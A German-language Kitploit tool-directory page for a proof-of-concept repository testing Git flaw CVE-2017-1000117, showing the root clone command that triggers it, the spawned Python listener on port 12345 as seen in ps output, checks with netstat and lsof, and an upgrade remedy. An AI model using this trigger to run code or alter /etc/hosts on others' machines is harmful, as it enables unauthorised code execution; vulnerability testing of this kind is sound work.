Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-1000117-test — Prüfung von CVE-2017-1000117 | Kitploit
Tools/GitHubGitHub/shadow5523/cve-2017-1000117-test
SchwachstellenanalyseExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubshadow5523/cve-2017-1000117-test

CVE-2017-1000117-test

Prüfung von CVE-2017-1000117

Repository anzeigen
vor 9 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Funktionsbeschreibung

Dieses Tool nutzt die Schwachstelle CVE-2017-1000117 aus. Wenn dieses Repository mit Root-Rechten und der Git-Option --recurse geklont wird, wird automatisch ein HTTP-Server gestartet, der auf Port 12345 horcht.
Um den HTTP-Server zu stoppen, finden Sie die Prozess-ID und killen Sie sie.

Getestete Betriebssysteme

CentOS7
macOS Sierra
Debian8

Ausführungsbefehl

Führen Sie den folgenden Befehl aus. Nach Abschluss bleibt die Konsole hängen, daher mit Strg+C beenden.

root@kitploit:~
    [root@localhost ~]$ git clone --recurse https://github.com/Shadow5523/CVE-2017-1000117-test.git

Überprüfung der Schwachstelle

  1. Führen Sie den ps-Befehl aus und prüfen Sie, ob der Python-Code läuft.
root@kitploit:~
    [root@localhost ~]$ ps ax | grep http
    21365 pts/0    S      0:00 python -c (lambda j: (lambda s, i: s.setsockopt(i.SOL_SOCKET, i.SO_REUSEADDR, 1) or s.bind((i.gethostname(), 12345)) or s.listen(10) or map(lambda y: y.send("HTTP/1.0 200 OK\r\nContent-Length: 20\r\nContent-Type: text/html\r\n\r\n<html><center>test</center></html>"), (s.accept()[0] for x in iter(int, 1))))(j.socket(j.AF_INET, j.SOCK_STREAM), j))(__import__("socket"))
    21381 pts/0    S+     0:00 grep --color=auto ht

  1. Überprüfen Sie mit netstat, ob Port 12345 horcht.
root@kitploit:~
    [root@localhost ~]$ netstat -tanp | grep 12345
    tcp        0      0 127.0.0.1:12345         0.0.0.0:*               LISTEN      21365/python

Unter macOS überprüfen Sie mit folgendem Befehl:

root@kitploit:~
    MAcbook:~ root# lsof -nP -iTCP -sTCP:LISTEN
    COMMAND   PID USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME
    Python  14231 root    3u  IPv4 0xa3955f2183c66251      0t0  TCP 127.0.0.1:12345 (LISTEN)
  1. Überprüfen Sie, ob in der letzten Zeile von /etc/hosts "127.0.0.1 Hostname" hinzugefügt wurde.

Gegenmaßnahme

Aktualisieren Sie Git auf die neueste Version. Siehe folgenden Link:
So aktualisieren Sie Git von einem GitHub-Remote-Repository auf die neueste Version

Tool herunterladen